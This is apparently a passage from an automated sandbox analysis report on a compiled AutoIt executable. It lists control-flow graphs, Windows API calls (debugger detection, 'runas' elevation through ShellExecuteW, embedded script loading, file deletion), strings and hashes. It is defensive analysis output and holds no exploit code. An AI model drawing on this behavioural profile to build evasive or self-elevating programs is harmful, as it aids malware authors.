101326->101327 101328 fa0191 101327->101328 101329 f87d2c 59 API calls 101328->101329 101330 f8f8f6 101329->101330 101331 fa03a2 6 API calls 101330->101331 101331->101294 101333 f877c7 59 API calls 101332->101333 101334 f960f7 101333->101334 101335 f877c7 59 API calls 101334->101335 101336 f960ff 101335->101336 101376 f95bfd 101336->101376 101339 f95bfd 59 API calls 101340 f9610f 101339->101340 101341 f877c7 59 API calls 101340->101341 101342 f9611a 101341->101342 101343 fa0ff6 Mailbox 59 API calls 101342->101343 101344 f8fa68 101343->101344 101345 f96259 101344->101345 101346 f96267 101345->101346 101347 f877c7 59 API calls 101346->101347 101348 f96272 101347->101348 101349 f877c7 59 API calls 101348->101349 101350 f9627d 101349->101350 101351 f877c7 59 API calls 101350->101351 101352 f96288 101351->101352 101353 f877c7 59 API calls 101352->101353 101354 f96293 101353->101354 101355 f95bfd 59 API calls 101354->101355 101356 f9629e 101355->101356 101357 fa0ff6 Mailbox 59 API calls 101356->101357 101358 f962a5 RegisterWindowMessageW 101357->101358 101358->101308 101361 f9ffee 101360->101361 101362 fd5cc3 101360->101362 101364 fa0ff6 Mailbox 59 API calls 101361->101364 101379 fe9d71 60 API calls 101362->101379 101365 f9fff6 101364->101365 101365->101312 101366 fd5cce 101367->101319 101368->101321 101380 fe748f 65 API calls 101368->101380 101370 f877c7 59 API calls 101369->101370 101371 fa0227 101370->101371 101372 f877c7 59 API calls 101371->101372 101373 fa022f 101372->101373 101374 f877c7 59 API calls 101373->101374 101375 fa017b 101374->101375 101375->101325 101377 f877c7 59 API calls 101376->101377 101378 f95c05 101377->101378 101378->101339 101379->101366

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F83B7A
                                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 00F83B8C
                                                                                                                        • GetFullPathNameW.KERNEL32(00007FFF,?,?,010462F8,010462E0,?,?), ref: 00F83BFD
                                                                                                                          • Part of subcall function 00F87D2C: _memmove.LIBCMT ref: 00F87D66
                                                                                                                          • Part of subcall function 00F90A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00F83C26,010462F8,?,?,?), ref: 00F90ACE
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00F83C81
                                                                                                                        • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,010393F0,00000010), ref: 00FBD4BC
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,010462F8,?,?,?), ref: 00FBD4F4
                                                                                                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,01035D40,010462F8,?,?,?), ref: 00FBD57A
                                                                                                                        • ShellExecuteW.SHELL32(00000000,?,?), ref: 00FBD581
                                                                                                                          • Part of subcall function 00F83A58: GetSysColorBrush.USER32(0000000F), ref: 00F83A62
                                                                                                                          • Part of subcall function 00F83A58: LoadCursorW.USER32(00000000,00007F00), ref: 00F83A71
                                                                                                                          • Part of subcall function 00F83A58: LoadIconW.USER32(00000063), ref: 00F83A88
                                                                                                                          • Part of subcall function 00F83A58: LoadIconW.USER32(000000A4), ref: 00F83A9A
                                                                                                                          • Part of subcall function 00F83A58: LoadIconW.USER32(000000A2), ref: 00F83AAC
                                                                                                                          • Part of subcall function 00F83A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00F83AD2
                                                                                                                          • Part of subcall function 00F83A58: RegisterClassExW.USER32(?), ref: 00F83B28
                                                                                                                          • Part of subcall function 00F839E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00F83A15
                                                                                                                          • Part of subcall function 00F839E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00F83A36
                                                                                                                          • Part of subcall function 00F839E7: ShowWindow.USER32(00000000,?,?), ref: 00F83A4A
                                                                                                                          • Part of subcall function 00F839E7: ShowWindow.USER32(00000000,?,?), ref: 00F83A53
                                                                                                                          • Part of subcall function 00F843DB: _memset.LIBCMT ref: 00F84401
                                                                                                                          • Part of subcall function 00F843DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F844A6
                                                                                                                        Strings
                                                                                                                        • runas, xrefs: 00FBD575
                                                                                                                        • This is a third-party compiled AutoIt script., xrefs: 00FBD4B4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                                                                        • String ID: This is a third-party compiled AutoIt script.$runas
                                                                                                                        • API String ID: 529118366-3287110873
                                                                                                                        • Opcode ID: e3fbe2a7a80607c445491e8024b0c64c0aad58bd1cce2c3325e2778eddbc6f2a
                                                                                                                        • Instruction ID: 2f0805ec5fa5c053f21cc3db7161443dd3a4b10b8253dcd53a6dab9203bf9d9f
                                                                                                                        • Opcode Fuzzy Hash: e3fbe2a7a80607c445491e8024b0c64c0aad58bd1cce2c3325e2778eddbc6f2a
                                                                                                                        • Instruction Fuzzy Hash: 7D5146B5E04249BBCF21FBB5DD85EED7BB8AB06700F004069F491A2151EA7E9605FB21

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 996 f84afe-f84b5e call f877c7 GetVersionExW call f87d2c 1001 f84c69-f84c6b 996->1001 1002 f84b64 996->1002 1004 fbdb90-fbdb9c 1001->1004 1003 f84b67-f84b6c 1002->1003 1006 f84c70-f84c71 1003->1006 1007 f84b72 1003->1007 1005 fbdb9d-fbdba1 1004->1005 1008 fbdba3 1005->1008 1009 fbdba4-fbdbb0 1005->1009 1010 f84b73-f84baa call f87e8c call f87886 1006->1010 1007->1010 1008->1009 1009->1005 1011 fbdbb2-fbdbb7 1009->1011 1019 fbdc8d-fbdc90 1010->1019 1020 f84bb0-f84bb1 1010->1020 1011->1003 1013 fbdbbd-fbdbc4 1011->1013 1013->1004 1015 fbdbc6 1013->1015 1018 fbdbcb-fbdbce 1015->1018 1021 f84bf1-f84c08 GetCurrentProcess IsWow64Process 1018->1021 1022 fbdbd4-fbdbf2 1018->1022 1023 fbdca9-fbdcad 1019->1023 1024 fbdc92 1019->1024 1020->1018 1025 f84bb7-f84bc2 1020->1025 1026 f84c0a 1021->1026 1027 f84c0d-f84c1e 1021->1027 1022->1021 1028 fbdbf8-fbdbfe 1022->1028 1032 fbdc98-fbdca1 1023->1032 1033 fbdcaf-fbdcb8 1023->1033 1029 fbdc95 1024->1029 1030 f84bc8-f84bca 1025->1030 1031 fbdc13-fbdc19 1025->1031 1026->1027 1035 f84c89-f84c93 GetSystemInfo 1027->1035 1036 f84c20-f84c30 call f84c95 1027->1036 1037 fbdc08-fbdc0e 1028->1037 1038 fbdc00-fbdc03 1028->1038 1029->1032 1039 fbdc2e-fbdc3a 1030->1039 1040 f84bd0-f84bd3 1030->1040 1041 fbdc1b-fbdc1e 1031->1041 1042 fbdc23-fbdc29 1031->1042 1032->1023 1033->1029 1034 fbdcba-fbdcbd 1033->1034 1034->1032 1043 f84c56-f84c66 1035->1043 1053 f84c7d-f84c87 GetSystemInfo 1036->1053 1054 f84c32-f84c3f call f84c95 1036->1054 1037->1021 1038->1021 1044 fbdc3c-fbdc3f 1039->1044 1045 fbdc44-fbdc4a 1039->1045 1047 fbdc5a-fbdc5d 1040->1047 1048 f84bd9-f84be8 1040->1048 1041->1021 1042->1021 1044->1021 1045->1021 1047->1021 1050 fbdc63-fbdc78 1047->1050 1051 fbdc4f-fbdc55 1048->1051 1052 f84bee 1048->1052 1055 fbdc7a-fbdc7d 1050->1055 1056 fbdc82-fbdc88 1050->1056 1051->1021 1052->1021 1057 f84c47-f84c4b 1053->1057 1061 f84c41-f84c45 GetNativeSystemInfo 1054->1061 1062 f84c76-f84c7b 1054->1062 1055->1021 1056->1021 1057->1043 1060 f84c4d-f84c50 FreeLibrary 1057->1060 1060->1043 1061->1057 1062->1061
                                                                                                                        APIs
                                                                                                                        • GetVersionExW.KERNEL32(?), ref: 00F84B2B
                                                                                                                          • Part of subcall function 00F87D2C: _memmove.LIBCMT ref: 00F87D66
                                                                                                                        • GetCurrentProcess.KERNEL32(?,0100FAEC,00000000,00000000,?), ref: 00F84BF8
                                                                                                                        • IsWow64Process.KERNEL32(00000000), ref: 00F84BFF
                                                                                                                        • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00F84C45
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00F84C50
                                                                                                                        • GetSystemInfo.KERNEL32(00000000), ref: 00F84C81
                                                                                                                        • GetSystemInfo.KERNEL32(00000000), ref: 00F84C8D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1986165174-0
                                                                                                                        • Opcode ID: 0464a1145e7b4ac34553081c9e5be7e7fb8ee3461a4cb3a3037165270735e53e
                                                                                                                        • Instruction ID: 30a33559eadbadbf2b9c8ff22cc54bc63a02305eafaecefa26fa523d3fb0c490
                                                                                                                        • Opcode Fuzzy Hash: 0464a1145e7b4ac34553081c9e5be7e7fb8ee3461a4cb3a3037165270735e53e
                                                                                                                        • Instruction Fuzzy Hash: DF91D67194A7C1DEC731EB7884512EAFFE4AF66310B584D5ED0CB83A41D224F948EB1A

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1063 f84fe9-f85001 CreateStreamOnHGlobal 1064 f85021-f85026 1063->1064 1065 f85003-f8501a FindResourceExW 1063->1065 1066 fbdd5c-fbdd6b LoadResource 1065->1066 1067 f85020 1065->1067 1066->1067 1068 fbdd71-fbdd7f SizeofResource 1066->1068 1067->1064 1068->1067 1069 fbdd85-fbdd90 LockResource 1068->1069 1069->1067 1070 fbdd96-fbddb4 1069->1070 1070->1067
                                                                                                                        APIs
                                                                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00F84EEE,?,?,00000000,00000000), ref: 00F84FF9
                                                                                                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00F84EEE,?,?,00000000,00000000), ref: 00F85010
                                                                                                                        • LoadResource.KERNEL32(?,00000000,?,?,00F84EEE,?,?,00000000,00000000,?,?,?,?,?,?,00F84F8F), ref: 00FBDD60
                                                                                                                        • SizeofResource.KERNEL32(?,00000000,?,?,00F84EEE,?,?,00000000,00000000,?,?,?,?,?,?,00F84F8F), ref: 00FBDD75
                                                                                                                        • LockResource.KERNEL32(00F84EEE,?,?,00F84EEE,?,?,00000000,00000000,?,?,?,?,?,?,00F84F8F,00000000), ref: 00FBDD88
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                        • String ID: SCRIPT
                                                                                                                        • API String ID: 3051347437-3967369404
                                                                                                                        • Opcode ID: eff73b7b84c92daa6c287a43a3a13118541996a16a5f7ef787d2cb10eb9529f8
                                                                                                                        • Instruction ID: bae96c2c1859e767113030cd5b91ab87106cf9e492492bba9bb1799ee8447075
                                                                                                                        • Opcode Fuzzy Hash: eff73b7b84c92daa6c287a43a3a13118541996a16a5f7ef787d2cb10eb9529f8
                                                                                                                        • Instruction Fuzzy Hash: 0B115A75600B02AFE7329B65DC58FA77BB9EBC9B51F20416CF44696250DB62E800AB60
                                                                                                                        APIs
                                                                                                                        • GetFileAttributesW.KERNELBASE(?,00FBE7C1), ref: 00FE46A6
                                                                                                                        • FindFirstFileW.KERNELBASE(?,?), ref: 00FE46B7
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00FE46C7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFind$AttributesCloseFirst
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 48322524-0
                                                                                                                        • Opcode ID: 9ada58c725e0ae16bd2afafe39050fd083b1ab25c228348603100e2290fb2d69
                                                                                                                        • Instruction ID: 00398bfc6536823b953f552d1db166ec284043ece0082277beba18bf749bcc37
                                                                                                                        • Opcode Fuzzy Hash: 9ada58c725e0ae16bd2afafe39050fd083b1ab25c228348603100e2290fb2d69
                                                                                                                        • Instruction Fuzzy Hash: 4DE026328104016B8230B738EC4D8EAB7ACDE06335F10071AF975C20D0EBB4BD60A7DA
                                                                                                                        Strings
                                                                                                                        • Variable must be of type 'Object'., xrefs: 00FC428C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Variable must be of type 'Object'.
                                                                                                                        • API String ID: 0-109567571
                                                                                                                        • Opcode ID: 70759007ce4b7a93247e362751716292629af49fe35b82eb82b4cd307e8d9885
                                                                                                                        • Instruction ID: 0f98d11ceefa24ff9e9c96c2ab4dacdf396e146d21d849b1e96548d8690673dc
                                                                                                                        • Opcode Fuzzy Hash: 70759007ce4b7a93247e362751716292629af49fe35b82eb82b4cd307e8d9885
                                                                                                                        • Instruction Fuzzy Hash: C3A28975E00206CFCB24EF58C981BEAB7B1FF49310F248069E956AB351D735AC46EB81
                                                                                                                        APIs
                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F90BBB
                                                                                                                        • timeGetTime.WINMM ref: 00F90E76
                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F90FB3
                                                                                                                        • TranslateMessage.USER32(?), ref: 00F90FC7
                                                                                                                        • DispatchMessageW.USER32(?), ref: 00F90FD5
                                                                                                                        • Sleep.KERNEL32(0000000A), ref: 00F90FDF
                                                                                                                        • LockWindowUpdate.USER32(00000000,?,?), ref: 00F9105A
                                                                                                                        • DestroyWindow.USER32 ref: 00F91066
                                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F91080
                                                                                                                        • Sleep.KERNEL32(0000000A,?,?), ref: 00FC52AD
                                                                                                                        • TranslateMessage.USER32(?), ref: 00FC608A
                                                                                                                        • DispatchMessageW.USER32(?), ref: 00FC6098
                                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FC60AC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                                                                                                                        • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                                                        • API String ID: 4003667617-3242690629
                                                                                                                        • Opcode ID: 9969d456894b829df0feaaad3048beaa81bb41fad0a9563964b7ac3d4186a458
                                                                                                                        • Instruction ID: 6f34aa9e322acbe50396e9c536d8465097e93edf453cd59c8f55f6654dd86006
                                                                                                                        • Opcode Fuzzy Hash: 9969d456894b829df0feaaad3048beaa81bb41fad0a9563964b7ac3d4186a458
                                                                                                                        • Instruction Fuzzy Hash: 97B2F570A08742DFDB24DF24C985FAAB7E4FF84714F14491DE48987291DB79E884EB82

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00FE91E9: __time64.LIBCMT ref: 00FE91F3
                                                                                                                          • Part of subcall function 00F85045: _fseek.LIBCMT ref: 00F8505D
                                                                                                                        • __wsplitpath.LIBCMT ref: 00FE94BE
                                                                                                                          • Part of subcall function 00FA432E: __wsplitpath_helper.LIBCMT ref: 00FA436E
                                                                                                                        • _wcscpy.LIBCMT ref: 00FE94D1
                                                                                                                        • _wcscat.LIBCMT ref: 00FE94E4
                                                                                                                        • __wsplitpath.LIBCMT ref: 00FE9509
                                                                                                                        • _wcscat.LIBCMT ref: 00FE951F
                                                                                                                        • _wcscat.LIBCMT ref: 00FE9532
                                                                                                                          • Part of subcall function 00FE922F: _memmove.LIBCMT ref: 00FE9268
                                                                                                                          • Part of subcall function 00FE922F: _memmove.LIBCMT ref: 00FE9277
                                                                                                                        • _wcscmp.LIBCMT ref: 00FE9479
                                                                                                                          • Part of subcall function 00FE99BE: _wcscmp.LIBCMT ref: 00FE9AAE
                                                                                                                          • Part of subcall function 00FE99BE: _wcscmp.LIBCMT ref: 00FE9AC1
                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00FE96DC
                                                                                                                        • _wcsncpy.LIBCMT ref: 00FE974F
                                                                                                                        • DeleteFileW.KERNEL32(?,?), ref: 00FE9785
                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00FE979B
                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00FE97AC
                                                                                                                        • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00FE97BE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1500180987-0
                                                                                                                        • Opcode ID: 6cb0afa73d246e42219faaf434eb04cf2d4412a1f3e8b13b9c238ce945910d53
                                                                                                                        • Instruction ID: 25589de312ba3bb731f26f2a3b4eaca6da250d71f85b5cc86a9482b1c1436e29
                                                                                                                        • Opcode Fuzzy Hash: 6cb0afa73d246e42219faaf434eb04cf2d4412a1f3e8b13b9c238ce945910d53
                                                                                                                        • Instruction Fuzzy Hash: E9C13BB1E00219AFDF21DF95CC85ADEB7BDEF45310F0040AAF609E6141EB749A849F65

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00F83074
                                                                                                                        • RegisterClassExW.USER32(00000030), ref: 00F8309E
                                                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F830AF
                                                                                                                        • InitCommonControlsEx.COMCTL32(?), ref: 00F830CC
                                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F830DC
                                                                                                                        • LoadIconW.USER32(000000A9), ref: 00F830F2
                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F83101
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                        • API String ID: 2914291525-1005189915
                                                                                                                        • Opcode ID: 79b9f84cea3dd8776154c16776b6fc1c08532976efb6920f1de87f99406debde
                                                                                                                        • Instruction ID: e054fba3b49bdf8d97eff1ce1c2d270012dc2418c46d1128eed0a4f45ccaf482
                                                                                                                        • Opcode Fuzzy Hash: 79b9f84cea3dd8776154c16776b6fc1c08532976efb6920f1de87f99406debde
                                                                                                                        • Instruction Fuzzy Hash: 79317AB584130AEFEB61CFA4D985AC9BBF0FB09310F14411EE5C0E6284E7BA0585DF51

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00F83074
                                                                                                                        • RegisterClassExW.USER32(00000030), ref: 00F8309E
                                                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F830AF
                                                                                                                        • InitCommonControlsEx.COMCTL32(?), ref: 00F830CC
                                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F830DC
                                                                                                                        • LoadIconW.USER32(000000A9), ref: 00F830F2
                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F83101
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                        • API String ID: 2914291525-1005189915
                                                                                                                        • Opcode ID: 7b3e48646341db8de15bea431d02ac0a1ef794b807e7615ae83feb6d621101de
                                                                                                                        • Instruction ID: 8821825841a457b4336e7df541ae414832088dddb54b73fa359d0d7c23133568
                                                                                                                        • Opcode Fuzzy Hash: 7b3e48646341db8de15bea431d02ac0a1ef794b807e7615ae83feb6d621101de
                                                                                                                        • Instruction Fuzzy Hash: FC21E5F5900309AFEB21DFA4E988A9DBBF4FB09700F00421AF591E6284E7BB45449F91

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00F84864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,010462F8,?,00F837C0,?), ref: 00F84882
                                                                                                                          • Part of subcall function 00FA074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00F872C5), ref: 00FA0771
                                                                                                                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00F87308
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00FBECF1
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00FBED32
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00FBED70
                                                                                                                        • _wcscat.LIBCMT ref: 00FBEDC9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
